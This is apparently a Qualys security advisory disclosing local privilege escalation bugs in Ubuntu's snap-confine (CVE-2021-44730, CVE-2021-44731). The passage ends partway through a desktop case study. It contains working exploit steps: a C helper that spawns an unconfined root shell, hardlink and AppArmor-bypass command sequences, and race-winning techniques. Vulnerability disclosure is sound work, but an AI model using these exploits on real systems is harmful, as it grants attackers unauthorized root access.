Qualys Security Advisory

Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine)


========================================================================
Contents
========================================================================

Summary
Two minor bugs
An unexploitable bug
CVE-2021-44730: Hardlink attack in snap-confine's sc_open_snapd_tool()
CVE-2021-44731: Race condition in snap-confine's setup_private_mount()
- Case study: Ubuntu Server, near-default installation
- Case study: Ubuntu Desktop, default installation
CVE-2021-3996: Unauthorized unmount in util-linux's libmount
CVE-2021-3995: Unauthorized unmount in util-linux's libmount
CVE-2021-3998: Unexpected return value from glibc's realpath()
CVE-2021-3999: Off-by-one buffer overflow/underflow in glibc's getcwd()
CVE-2021-3997: Uncontrolled recursion in systemd's systemd-tmpfiles
Acknowledgments
Timeline

    "Some of the new puzzles are superb and will have you scratching
    your head for some time as you check out all the possible routes
    and find most of them are red herrings."
        -- John Sweeney (1992). "Oh No! More Lemmings". New Atari
           User (55).


========================================================================
Summary
========================================================================

We recently audited snap-confine (a SUID-root program that is installed
by default on Ubuntu) and discovered two vulnerabilities (two Local
Privilege Escalations, from any user to root): CVE-2021-44730 and
CVE-2021-44731.

    "Snap is a software packaging and deployment system developed by
    Canonical for operating systems that use the Linux kernel. The
    packages, called snaps, and the tool for using them, snapd, work
    across a range of Linux distributions and allow upstream software
    developers to distribute their applications directly to users.
    Snaps are self-contained applications running in a sandbox with
    mediated access to the host system."
    (Wikipedia)

    "snap-confine is a program used internally by snapd to construct
    the execution environment for snap applications."
    (man snap-confine)

Discovering and exploiting a vulnerability in snap-confine has been
extremely challenging (especially in a default installation of Ubuntu),
because snap-confine uses a very defensive programming style, AppArmor
profiles, seccomp filters, mount namespaces, and two Go helper programs.
Eventually, we discovered two vulnerabilities:

- CVE-2021-44730, a hardlink attack that is exploitable in a non-default
  configuration only (when the kernel's fs.protected_hardlinks is 0);

- CVE-2021-44731, a race condition that is exploitable in default
  installations of Ubuntu Desktop, and near-default installations of
  Ubuntu Server (the default installation, plus one of the "Featured
  Server Snaps" that are offered during the installation; for example,
  "heroku" or "microk8s").

While working on snap-confine, we also discovered several
vulnerabilities in related packages and libraries: CVE-2021-3996 and
CVE-2021-3995 in util-linux (libmount and umount), CVE-2021-3998 and
CVE-2021-3999 in the glibc (realpath() and getcwd()), and CVE-2021-3997
in systemd (systemd-tmpfiles). We partially published these secondary
vulnerabilities in January 2022, shortly after their patches became
available:

https://www.openwall.com/lists/oss-security/2022/01/10/2
https://www.openwall.com/lists/oss-security/2022/01/24/2
https://www.openwall.com/lists/oss-security/2022/01/24/4

If you enjoy puzzle games like Lemmings (which turns 31 this year!),
then we hope that you will enjoy this advisory.

========================================================================
Two minor bugs
========================================================================

    Don't let your eyes deceive you
        -- Lemmings, Fun Level 15

We almost abandoned our audit after a few days, because snap-confine is
programmed very defensively, and it has been thoroughly reviewed before
(by Matthias Gerstner of the SUSE Security Team):

https://www.openwall.com/lists/oss-security/2019/04/18/4
https://bugzilla.suse.com/show_bug.cgi?id=1127368

Nevertheless, we decided to continue our audit because we spotted two
minor bugs (probably typos) and began to suspect that nastier bugs might
be hiding in snap-confine. Both minor bugs are located in the main()
function:

------------------------------------------------------------------------
433     sc_identity real_user_identity = {
434         .uid = real_uid,
435         .gid = real_gid,
436         .change_uid = 1,
437         .change_gid = 1,
438     };
439     sc_set_effective_identity(real_user_identity);
...
466     if (getresuid(&real_uid, &effective_uid, &saved_uid) != 0) {
467         die("getresuid failed");
468     }
...
494     // Permanently drop if not root
495     if (effective_uid == 0) {
...
498         if (setgid(real_gid) != 0)
499             die("setgid failed");
500         if (setuid(real_uid) != 0)
501             die("setuid failed");
502
503         if (real_gid != 0 && (getuid() == 0 || geteuid() == 0))
504             die("permanently dropping privs did not work");
505         if (real_uid != 0 && (getgid() == 0 || getegid() == 0))
506             die("permanently dropping privs did not work");
507     }
...
542     execv(invocation.executable, (char *const *)&argv[0]);
------------------------------------------------------------------------

The "real_gid" at line 503 should be "real_uid", and the "real_uid" at
line 505 should be "real_gid". This first bug does not have dangerous
consequences, because the lines 503-506 are basically defense-in-depth
checks: the lines 498-501 have already checked that the root privileges
were dropped successfully.
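
To make the first typo concrete, here is a minimal sketch of what the
checks at lines 503-506 presumably intended, with each uid test guarded
by real_uid and each gid test guarded by real_gid. The helper name
still_privileged() and its parameters are hypothetical (they are not
part of snap-confine), and the current ids are passed in explicitly so
that the logic can be exercised without actually changing privileges:

```c
#include <stdbool.h>
#include <sys/types.h>

/*
 * Hypothetical helper, not snap-confine code: returns true if root
 * privileges are still held although the corresponding real id is
 * unprivileged. The uid check is paired with real_uid and the gid
 * check with real_gid (the pairing that lines 503 and 505 swap).
 */
bool still_privileged(uid_t real_uid, gid_t real_gid,
                      uid_t cur_uid, uid_t cur_euid,
                      gid_t cur_gid, gid_t cur_egid)
{
    /* A non-root real uid must not keep uid 0 or euid 0. */
    if (real_uid != 0 && (cur_uid == 0 || cur_euid == 0))
        return true;
    /* A non-root real gid must not keep gid 0 or egid 0. */
    if (real_gid != 0 && (cur_gid == 0 || cur_egid == 0))
        return true;
    return false;
}
```

A caller would pass getuid(), geteuid(), getgid() and getegid() after
the setgid()/setuid() calls and die if the helper returns true. With
the swapped comparisons, a user whose real gid is 0 but whose real uid
is not would skip the uid check entirely.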

Moreover, the second minor bug prevents snap-confine from actually
entering the code block at lines 495-507: the effective_uid at line 495
is in fact not 0 anymore, because the effective uid was set to the real,
unprivileged uid at lines 433-439, and the effective_uid variable was
set to this unprivileged uid at lines 466-468.

This second bug may seem serious at first glance, because it prevents
snap-confine from calling the privilege-dropping functions setuid() and
setgid() (at lines 498-501) before a user-controlled program is executed
(at line 542). In reality this does not have dangerous consequences: the
only remaining privileged uid (the saved uid) is automatically reset to
the effective, unprivileged uid by the execve() syscall (at line 542).

Despite their practical uselessness, these two minor bugs motivated us
to continue our audit, and we are deeply grateful to them.


========================================================================
An unexploitable bug
========================================================================

    DON'T PANIC
        -- Oh No! More Lemmings, Crazy Level 19

We also discovered a minor bug in the sc_call_snap_update_ns_as_user()
function:

------------------------------------------------------------------------
112     const char *xdg_runtime_dir = getenv("XDG_RUNTIME_DIR");
113     char xdg_runtime_dir_env[PATH_MAX + strlen("XDG_RUNTIME_DIR=")];
114     if (xdg_runtime_dir != NULL) {
115         sc_must_snprintf(xdg_runtime_dir_env,
116                          sizeof(xdg_runtime_dir_env),
117                          "XDG_RUNTIME_DIR=%s", xdg_runtime_dir);
118     }
...
127     char *envp[] = {
...
132         xdg_runtime_dir_env, NULL
133     };
134     sc_call_snapd_tool_with_apparmor(snap_update_ns_fd,
135                                      "snap-update-ns", apparmor,
136                                      aa_profile, argv, envp);
------------------------------------------------------------------------

If we execute snap-confine without an XDG_RUNTIME_DIR environment
variable, then the stack-based buffer xdg_runtime_dir_env[] is not
initialized (lines 112-118), and the uninitialized contents of this
buffer are passed as an environment variable to snap-update-ns (lines
127-136), a helper program that is executed with root privileges.

This bug may also seem serious at first glance (because we may be able
to control the contents of this uninitialized buffer), but we do not
believe that it is exploitable:

- snap-update-ns is a statically-linked Go program, and therefore does
  not process most of the "unsecure" environment variables (LD_PRELOAD,
  LD_AUDIT, etc);

- snap-update-ns is executed with effective uid 0 but unprivileged real
  uid (like a SUID-root program), and therefore runs in "secure" mode
  (__libc_enable_secure);

- snap-update-ns calls clearenv() in its bootstrap function, and thereby
  erases all environment variables (another layer of defense in depth).

More importantly, the size of sc_call_snap_update_ns_as_user()'s stack
frame (which contains the uninitialized buffer xdg_runtime_dir_env[]) is
~8KB, but the stack-frame size of sc_do_mount() (which is called before
sc_call_snap_update_ns_as_user()) is ~10KB and is filled with zeros. In
other words, xdg_runtime_dir_env[] is indirectly filled with zeros (by
sc_do_mount()) and we cannot pass an arbitrary environment variable to
snap-update-ns (just an empty environment variable).
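
The uninitialized-buffer pattern described above can be avoided by
giving the buffer a defined value on every path. The following is only a
sketch under our own assumptions: build_xdg_env() is a hypothetical
helper (not the upstream fix, which may look different), and plain
snprintf() stands in for snap-confine's sc_must_snprintf():

```c
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper, not snap-confine code: writes
 * "XDG_RUNTIME_DIR=<value>" into out, or an empty string when value is
 * NULL, so that out never carries stale stack contents.
 * Returns 0 on success, -1 if the buffer is too small.
 */
int build_xdg_env(char *out, size_t out_size, const char *value)
{
    if (out == NULL || out_size == 0)
        return -1;

    /* Always start from a well-defined, empty string. */
    out[0] = '\0';
    if (value == NULL)
        return 0;

    int n = snprintf(out, out_size, "XDG_RUNTIME_DIR=%s", value);
    if (n < 0 || (size_t)n >= out_size) {
        /* Truncated or failed: do not leave a partial entry behind. */
        out[0] = '\0';
        return -1;
    }
    return 0;
}
```

With such a helper, running without XDG_RUNTIME_DIR deterministically
yields the same empty entry that the zero-filled stack frame of
sc_do_mount() happens to produce today, instead of depending on what a
previous function left on the stack.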


========================================================================
CVE-2021-44730: Hardlink attack in snap-confine's sc_open_snapd_tool()
========================================================================

    Easy when you know how
        -- Lemmings, Fun Level 17

snap-confine dynamically obtains the path to snap-update-ns and
snap-discard-ns (two helper programs that are executed with root
privileges) by reading its own path via /proc/self/exe (at line 166), by
opening this path's directory (at line 174), and by opening the helper
program inside this directory (at line 179) -- this helper program is
later executed via fexecve():

------------------------------------------------------------------------
 69 int sc_open_snap_update_ns(void)
 70 {
 71     return sc_open_snapd_tool("snap-update-ns");
 72 }
------------------------------------------------------------------------
139 int sc_open_snap_discard_ns(void)
140 {
141     return sc_open_snapd_tool("snap-discard-ns");
142 }
------------------------------------------------------------------------
160 static int sc_open_snapd_tool(const char *tool_name)
161 {
...
166     if (readlink("/proc/self/exe", buf, sizeof buf) < 0) {
...
172     char *dir_name = dirname(buf);
...
174     dir_fd = open(dir_name, O_PATH | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
...
179     tool_fd = openat(dir_fd, tool_name, O_PATH | O_NOFOLLOW | O_CLOEXEC);
...
184     return tool_fd;
185 }
------------------------------------------------------------------------

Unfortunately, if we are able to hardlink snap-confine into a directory
that we own, and if we execute this hardlink, then snap-confine will
open our directory and execute our own, arbitrary snap-update-ns and
snap-discard-ns programs, as root.

Important note: this is impossible in a default configuration (although
the kernel's fs.protected_hardlinks is 0 by default, the distributions
set this sysctl to 1 by default).
Consequently, in the following proof of concept, we exploit a default
installation of Ubuntu Server whose fs.protected_hardlinks sysctl has
been manually reset to 0.

________________________________________________________________________

First, failed attempt
________________________________________________________________________

First, as an unprivileged user, we make sure that the "lxd" snap (the
only snap installed by default on Ubuntu Server) has been started
(although it should have been started automatically at boot time):

------------------------------------------------------------------------
$ id
uid=1001(jane) gid=1001(jane) groups=1001(jane)

$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd /usr/lib/snapd/snap-confine --base core18 snap.lxd.daemon /nonexistent
...
------------------------------------------------------------------------

Next, we hardlink snap-confine into a directory in /tmp, and (in the
same directory) we create a simple snap-discard-ns program that should
eventually be executed as root:

------------------------------------------------------------------------
$ mkdir -m 0700 /tmp/.tmp
$ cd /tmp/.tmp

$ ln -i /usr/lib/snapd/snap-confine ./

$ cp -i "$(which true)" snap-update-ns

$ cat > snap-discard-ns.c << "EOF"
#include <stdlib.h>
#include <unistd.h>
int
main(void)
{
    if (setuid(0)) _exit(__LINE__);
    if (setgid(0)) _exit(__LINE__);
    char * const argv[] = { "/bin/bash", "-c", "id; cat /proc/self/attr/current", NULL };
    execve(*argv, argv, NULL);
    _exit(__LINE__);
}
EOF

$ gcc -o snap-discard-ns snap-discard-ns.c
------------------------------------------------------------------------

Last, we execute our hardlinked snap-confine with a different base
("snapd" instead of "core18"), which forces snap-confine to restart the
"lxd" snap and therefore to execute our own snap-discard-ns program:

------------------------------------------------------------------------
$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd ./snap-confine --base snapd snap.lxd.daemon /nonexistent
...
DEBUG: apparmor label on snap-confine is: unconfined
DEBUG: apparmor mode is: (null)
snap-confine has elevated permissions and is not confined but should be. Refusing to continue to avoid permission escalation attacks
------------------------------------------------------------------------

This first attempt failed: snap-confine exited because it detected that
it was "unconfined" -- it is normally confined by an AppArmor profile
named "/usr/lib/snapd/snap-confine", which was not applied here because
we executed /tmp/.tmp/snap-confine, not /usr/lib/snapd/snap-confine.

________________________________________________________________________

Second, failed attempt
________________________________________________________________________

To solve this first problem, we force snap-confine's AppArmor profile on
/tmp/.tmp/snap-confine, by wrapping its execution in aa-exec (a tool for
confining a program with an AppArmor profile):

------------------------------------------------------------------------
$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
...
cannot execute snapd tool snap-discard-ns: Permission denied
snap-discard-ns failed with code 1
------------------------------------------------------------------------

This second attempt also failed, because snap-confine's AppArmor profile
denied the execution of our snap-discard-ns program in /tmp:

------------------------------------------------------------------------
# dmesg | tail -n 1
[16732.767948] audit: type=1400 audit(1635093756.584:30): apparmor="DENIED" operation="exec" profile="/usr/lib/snapd/snap-confine" name="/tmp/.tmp/snap-discard-ns" pid=1777 comm="snap-confine" requested_mask="x" denied_mask="x" fsuid=0 ouid=1001
------------------------------------------------------------------------

________________________________________________________________________

Third, failed attempt
________________________________________________________________________

To solve this second problem, we reviewed snap-confine's AppArmor
profile (in /etc/apparmor.d/usr.lib.snapd.snap-confine.real) and noticed
that it allows the execution of programs in ~/.Private:

    @{HOME}/.Private/** mrixwlk,

We therefore move our /tmp/.tmp directory to ~/.Private, and make
another attempt:

------------------------------------------------------------------------
$ mkdir -m 0700 ~/.Private
$ cd ~/.Private

$ mv -i /tmp/.tmp ./
$ cd .tmp

$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
...
snap-discard-ns failed with code 10
------------------------------------------------------------------------

This third attempt succeeded in executing our snap-discard-ns program,
but failed to subsequently execute /bin/bash (again because of
snap-confine's AppArmor profile):

------------------------------------------------------------------------
# dmesg | tail -n 1
[16991.232201] audit: type=1400 audit(1635094015.048:31): apparmor="DENIED" operation="exec" profile="/usr/lib/snapd/snap-confine" name="/usr/bin/bash" pid=1789 comm="6" requested_mask="x" denied_mask="x" fsuid=0 ouid=0
------------------------------------------------------------------------

________________________________________________________________________

Fourth, partially successful attempt
________________________________________________________________________

To solve this third problem, we noticed that snap-confine's AppArmor
profile allows the transition to AppArmor profiles that are not
"unconfined" and that do not start with '/':

    change_profile unsafe /** -> [^u/]**,

and we also noticed that one of the "lxd" snap's AppArmor profiles
("snap.lxd.daemon" in /var/lib/snapd/apparmor/profiles/snap.lxd.daemon)
is more permissive than snap-confine's profile.
We therefore modify our snap-discard-ns program, to transition to the
"snap.lxd.daemon" profile when executing /bin/bash (by writing "exec
snap.lxd.daemon" to the file /proc/self/attr/exec, which is what
"aa-exec -p snap.lxd.daemon" does):

------------------------------------------------------------------------
$ cat > snap-discard-ns.c << "EOF"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int
main(void)
{
    if (setuid(0)) _exit(__LINE__);
    if (setgid(0)) _exit(__LINE__);
    FILE * const fp = fopen("/proc/self/attr/exec", "w");
    if (!fp) _exit(__LINE__);
    if (fputs("exec snap.lxd.daemon", fp) < 0) _exit(__LINE__);
    if (fclose(fp)) _exit(__LINE__);
    char * const argv[] = { "/bin/bash", "-c", "id; cat /proc/self/attr/current", NULL };
    execve(*argv, argv, NULL);
    _exit(__LINE__);
}
EOF

$ gcc -o snap-discard-ns snap-discard-ns.c

$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
...
uid=0(root) gid=0(root) groups=0(root),1001(jane)
snap.lxd.daemon (enforce)
...
------------------------------------------------------------------------

This fourth attempt succeeded in executing /bin/bash and id, but this
root shell is still confined ("snap.lxd.daemon (enforce)") and we would
rather obtain an unconfined root shell.

________________________________________________________________________

Fifth, successful attempt
________________________________________________________________________

To solve this fourth and last problem, we noticed that the AppArmor
profile "snap.lxd.daemon" allows the unconfined execution of aa-exec:

    /{,usr/}{,s}bin/aa-exec ux,

We therefore modify our snap-discard-ns program, to wrap the execution
of our shell commands in "aa-exec -p unconfined":

------------------------------------------------------------------------
$ cat > snap-discard-ns.c << "EOF"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int
main(void)
{
    if (setuid(0)) _exit(__LINE__);
    if (setgid(0)) _exit(__LINE__);
    FILE * const fp = fopen("/proc/self/attr/exec", "w");
    if (!fp) _exit(__LINE__);
    if (fputs("exec snap.lxd.daemon", fp) < 0) _exit(__LINE__);
    if (fclose(fp)) _exit(__LINE__);
    char * const argv[] = { "/bin/bash", "-c", "exec aa-exec -p unconfined -- "
        "/bin/bash -c 'id; cat /proc/self/attr/current'", NULL };
    execve(*argv, argv, NULL);
    _exit(__LINE__);
}
EOF

$ gcc -o snap-discard-ns snap-discard-ns.c

$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
...
uid=0(root) gid=0(root) groups=0(root),1001(jane)
unconfined
...
------------------------------------------------------------------------

Finally, this fifth attempt successfully executed an unconfined root
shell.

Although we consider this attack impractical (because the sysctl
fs.protected_hardlinks is 1 by default), it gave us the idea that
eventually allowed us to exploit snap-confine in a default installation:
what if we were able to create a copy of the SUID-root snap-confine in a
writable directory like /tmp, but without creating a hardlink? We were
particularly curious about bind-mounts, because snap-confine makes
extensive use of bind-mounts to set up its sandboxes.
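
Because the hardlink attack hinges entirely on the value of
fs.protected_hardlinks, administrators may want to confirm that setting
on their systems. The following is a minimal sketch, assuming the
standard procfs location /proc/sys/fs/protected_hardlinks; the helper
names read_int_file() and hardlinks_protected() are our own and purely
illustrative:

```c
#include <stdio.h>

/*
 * Hypothetical helper: reads a single integer from a sysctl-style file.
 * Returns the value, or -1 if the file cannot be opened or parsed.
 */
int read_int_file(const char *path)
{
    FILE *fp = fopen(path, "r");
    if (fp == NULL)
        return -1;

    int value = -1;
    if (fscanf(fp, "%d", &value) != 1)
        value = -1;
    fclose(fp);
    return value;
}

/*
 * Returns 1 if hardlink protection is enabled, 0 if it is disabled
 * (the non-default configuration in which CVE-2021-44730 is
 * exploitable), and -1 if the setting cannot be read.
 */
int hardlinks_protected(void)
{
    return read_int_file("/proc/sys/fs/protected_hardlinks");
}
```

A return value of 0 corresponds to the configuration that was manually
set for the proof of concept above; the same information is available
from the command line via "sysctl fs.protected_hardlinks".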


========================================================================
CVE-2021-44731: Race condition in snap-confine's setup_private_mount()
========================================================================

    It's all a matter of timing
        -- Oh No! More Lemmings, Havoc Level 12

To set up a snap's sandbox (more precisely, its mount namespace),
snap-confine's function setup_private_mount() creates a temporary
directory /tmp/snap.$SNAP_NAME/tmp (for example, /tmp/snap.lxd/tmp) --
or reuses it if it already exists -- and bind-mounts it onto the /tmp
directory inside the snap's mount namespace.

setup_private_mount() is programmed very defensively (f*() and *at()
syscalls, O_DIRECTORY and O_NOFOLLOW flags) to avoid race conditions:

------------------------------------------------------------------------
 56 static void setup_private_mount(const char *snap_name)
 57 {
 ..
 83     sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);
 84     sc_must_snprintf(tmp_dir, sizeof(tmp_dir), "%s/tmp", base_dir);
 ..
 91     if (mkdir(base_dir, 0700) < 0 && errno != EEXIST) {
 ..
 94     base_dir_fd = open(base_dir,
 95                        O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
...
106     if (fchmod(base_dir_fd, 0700) < 0) {
...
109     if (fchown(base_dir_fd, 0, 0) < 0) {
...
114     if (mkdirat(base_dir_fd, "tmp", 01777) < 0 && errno != EEXIST) {
...
118     tmp_dir_fd = openat(base_dir_fd, "tmp",
119                         O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
...
123     if (fchmod(tmp_dir_fd, 01777) < 0) {
...
127     if (fchown(tmp_dir_fd, 0, 0) < 0) {
...
131     sc_do_mount(tmp_dir, "/tmp", NULL, MS_BIND, NULL);
132     sc_do_mount("none", "/tmp", NULL, MS_PRIVATE, NULL);
133 }
------------------------------------------------------------------------

Unfortunately, this function is vulnerable to a race condition, because
the line 131 passes an absolute path (/tmp/snap.lxd/tmp) to the mount()
syscall, which does follow symlinks:

- we create the directory /tmp/snap.lxd, before we execute snap-confine;

- after the open() at line 94 but before the fchown() at line 109, we
  replace /tmp/snap.lxd with another directory that contains a symlink
  named "tmp" (which therefore becomes /tmp/snap.lxd/tmp) that points to
  an arbitrary directory;

- as a result, because the mount() at line 131 follows symlinks, we
  trick snap-confine into bind-mounting an arbitrary directory onto /tmp
  inside the snap's mount namespace.

This race condition opens up a world of possibilities: inside the snap's
mount namespace (which we can enter through snap-confine itself), we can
bind-mount a world-writable, non-sticky directory onto /tmp, or we can
bind-mount any other part of the filesystem onto /tmp. We will exploit
this powerful primitive in the two following case studies.

Note: we can reliably win this race condition, by monitoring
/tmp/snap.lxd with inotify, by pinning our exploit and snap-confine to
the same CPU with sched_setaffinity(), and by lowering snap-confine's
scheduling priority with setpriority() and sched_setscheduler().


========================================================================
Case study: Ubuntu Server, near-default installation
========================================================================

    Not as complicated as it looks
        -- Lemmings, Fun Level 8

In this first case study, we exploit a default installation of Ubuntu
Server, plus one of the "Featured Server Snaps" that are offered during
the installation; we abuse the snap "heroku" here, but other snaps can
be abused instead (for example, "microk8s").

Our main idea is to exploit CVE-2021-44731, bind-mount the directory
/usr/lib/snapd (which contains snap-confine) onto /tmp inside the snap's
mount namespace, and reproduce our exploit for CVE-2021-44730 (without a
hardlink): we execute /tmp/snap-confine (inside the snap's mount
namespace), and force it to execute our own /tmp/snap-discard-ns
program, as root.

In theory, this seems impossible: if we bind-mount /usr/lib/snapd onto
/tmp, then /tmp/snap-discard-ns will always be the real snap-discard-ns,
not our own program. In practice, when snap-confine is executed inside a
mount namespace, it first calls sc_reassociate_with_pid1_mount_ns(),
which enters init's mount namespace, where /tmp is not bind-mounted:
snap-confine executes /tmp/snap-discard-ns outside the snap's mount
namespace, where we can create our own programs in /tmp.

________________________________________________________________________

First, failed attempt
________________________________________________________________________

In this first version of our exploit, we create an empty directory
/tmp/snap.heroku and a directory /tmp/snap.XXXXXX that contains a "tmp"
symlink to /usr/lib/snapd, and we exchange these two directories at the
right time, to bind-mount /usr/lib/snapd onto /tmp inside heroku's mount
namespace. The command we execute is "/usr/lib/snapd/snap-confine --base
core snap.heroku.heroku /bin/bash -c 'sleep 10; /tmp/snap-confine --base
snapd snap.heroku.heroku /nonexistent'".

Note: if the "core" base is not installed, we can use the "core18" base
instead, but then we must bind-mount /snap/snapd/current/usr/lib/snapd
instead of /usr/lib/snapd (for glibc compatibility reasons).

------------------------------------------------------------------------
$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

$ cd /tmp

$ cp -i "$(which true)" snap-update-ns

$ gcc -o snap-discard-ns snap-discard-ns.c

$ gcc -o CVE-2021-44731-Server1 CVE-2021-44731-Server1.c

$ ./CVE-2021-44731-Server1
...
DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine
DEBUG: apparmor mode is: enforce
...
cannot chmod base directory /tmp/snap.heroku to 0700: Operation not permitted
------------------------------------------------------------------------

This first attempt failed, because snap-confine's AppArmor profile
prevented setup_private_mount() from fchmod()ing our /tmp/snap.heroku
directory (at line 106):

------------------------------------------------------------------------
# dmesg | tail -n 1
[26963.479502] audit: type=1400 audit(1635180724.155:37): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=1712 comm="snap-confine" capability=3 capname="fowner"
------------------------------------------------------------------------

________________________________________________________________________

Second, failed attempt
________________________________________________________________________

To solve this first, seemingly insurmountable problem, we tried out a
Crazy! Wild! Wicked! idea -- to execute snap-confine in "unconfined"
mode, by wrapping it in "aa-exec -p unconfined":

------------------------------------------------------------------------
$ gcc -o CVE-2021-44731-Server2 CVE-2021-44731-Server2.c

$ ./CVE-2021-44731-Server2
...
DEBUG: apparmor label on snap-confine is: unconfined
DEBUG: apparmor mode is: (null)
snap-confine has elevated permissions and is not confined but should be.
Refusing to continue to avoid permission escalation attacks
------------------------------------------------------------------------

Incredibly, this idea worked out; however, snap-confine's defensive
programming detected this unconfined execution and called exit().

________________________________________________________________________

Third, successful attempt
________________________________________________________________________

Since snap-confine refuses to run unconfined, but accepts AppArmor
profiles other than the intended "/usr/lib/snapd/snap-confine" profile,
we reviewed all AppArmor profiles and noticed that some of them are in
"complain" mode (for example, "snap.heroku.heroku"):

------------------------------------------------------------------------
# aa-status
apparmor module is loaded.
35 profiles are loaded.
33 profiles are in enforce mode.
...
2 profiles are in complain mode.
   snap.heroku.heroku
...
------------------------------------------------------------------------

These "complain" profiles log policy violations but allow the offending
program to continue its execution (unlike "kill" or "enforce" profiles);
we therefore try to wrap snap-confine in "aa-exec -p snap.heroku.heroku"
to bypass AppArmor:

------------------------------------------------------------------------
$ gcc -o CVE-2021-44731-Server3 CVE-2021-44731-Server3.c

$ ./CVE-2021-44731-Server3
...
DEBUG: apparmor label on snap-confine is: snap.heroku.heroku
DEBUG: apparmor mode is: complain
...
DEBUG: execv(/bin/bash, /bin/bash...)
DEBUG:  argv[1] = -c
DEBUG:  argv[2] = sleep 10; /tmp/snap-confine --base snapd snap.heroku.heroku /nonexistent
...
DEBUG: moving to mount namespace of pid 1
...
DEBUG: calling snapd tool snap-discard-ns
...
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
snap.heroku.heroku (complain)
...
------------------------------------------------------------------------

This third attempt successfully executed a root shell that is
effectively unconfined ("snap.heroku.heroku (complain)").

Side note: we tried and failed to exploit CVE-2021-44731 in a default
installation of Ubuntu Server (i.e., without an extra snap like "heroku"
or "microk8s"); we faced two problems:

- The "lxd" snap (the only snap installed by default on Ubuntu Server)
  is started automatically at boot time by snapd; this prevents us from
  creating /tmp/snap.lxd ourselves.

  The solution to this first problem is surprisingly easy, because the
  cron daemon is started before snapd at boot time: we can add an
  "@reboot touch /tmp/snap.lxd" command to our user's crontab and take
  ownership of this directory before snapd (on the next reboot).

- No AppArmor profiles are in "complain" mode by default; this prevents
  us from bypassing AppArmor (the fchmod() at line 106).

  Interestingly, the check that prevents snap-confine from running
  unconfined is very fragile (a fail-open check): if aa_is_enabled()
  fails (if it returns false), then snap-confine assumes that AppArmor
  is disabled, and allows us to run it unconfined.

  Internally, aa_is_enabled() calls the glibc's setmntent() (fopen()),
  getmntent() (malloc() and fgets()), and endmntent(); for example, if
  we set a low RLIMIT_NOFILE resource limit, then this fopen() fails,
  and snap-confine continues to run unconfined:

------------------------------------------------------------------------
$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd prlimit --nofile=4 aa-exec -p unconfined -- /usr/lib/snapd/snap-confine --base core18 snap.lxd.daemon /nonexistent
...
DEBUG: apparmor is not enabled: Too many open files
cannot open path /proc/1/ns/mnt: Too many open files
------------------------------------------------------------------------

  However, this RLIMIT_NOFILE resource limit is so low that subsequent
  open()s also fail and prevent snap-confine from running normally.
  We also tried to reach the system-wide limit on open files
  (fs.file-max) but failed, because systemd increases this limit to
  LONG_MAX (since version 240). We also tried to cause a failure in
  setmntent() or getmntent() by lowering the RLIMIT_DATA resource limit,
  but also failed.

  If you, dear reader, find a solution to this second problem, please
  post it to the public oss-security mailing list!


========================================================================
Case study: Ubuntu Desktop, default installation
========================================================================

    If at first you don't succeed..
        -- Lemmings, Taxing Level 1

To exploit CVE-2021-44731 in a default installation of Ubuntu Desktop,
we execute snap-confine with the "snap-store" snap (the only snap that
is installed by default) and we bypass AppArmor with one of the default
"complain" profiles (for example, "libreoffice-soffice").

Still, inside its sandbox, snap-confine applies one of snap-store's
"enforce" profiles (for example, "snap.snap-store.snap-store"), which
prevents us from successfully executing /tmp/snap-confine and therefore
prevents us from reusing our Ubuntu-Server exploitation technique:

------------------------------------------------------------------------
$ gcc -o CVE-2021-44731-Desktop0 CVE-2021-44731-Desktop0.c

$ ./CVE-2021-44731-Desktop0
...
DEBUG: apparmor label on snap-confine is: libreoffice-soffice
DEBUG: apparmor mode is: complain
...
DEBUG: execv(/bin/bash, /bin/bash...)
DEBUG:  argv[1] = -c
DEBUG:  argv[2] = sleep 10; /tmp/snap-confine --base snapd snap.snap-store.snap-store /nonexistent
...
DEBUG: apparmor is available but the interface but the interface is not available
cannot read mount namespace identifier of pid 1: Permission denied
------------------------------------------------------------------------

Belatedly, we realized that the setup of snap-store's mount namespace is
extremely complicated; indeed, snap-confine executes the helper program
snap-update-ns twice:

- a first time, to set up the "system" bind-mounts listed in
  /var/lib/snapd/mount/snap.snap-store.fstab;

- a second time, to set up the "user" bind-mounts listed in
  /var/lib/snapd/mount/snap.snap-store.user-fstab.

Among those system bind-mounts, one in particular caught our attention:

/var/lib/snapd/hostfs/var/lib/app-info /var/lib/app-info none bind,ro 0 0

To set up this bind-mount, snap-update-ns must first create the
directory /var/lib/app-info; but inside snap-store's mount namespace,
/var/lib is in a read-only filesystem (the "core18" base's squashfs).
Consequently, snap-update-ns must first create a "mimic" -- a writable
copy of /var/lib:

1/ it bind-mounts /var/lib onto /tmp/.snap/var/lib (inside snap-store's
   mount namespace);

2/ it mounts a tmpfs onto /var/lib;

3/ it bind-mounts every directory entry from /tmp/.snap/var/lib back
   into /var/lib;

4/ it creates the directory /var/lib/app-info (which is in a writable
   tmpfs now);

5/ it bind-mounts /var/lib/snapd/hostfs/var/lib/app-info onto
   /var/lib/app-info.

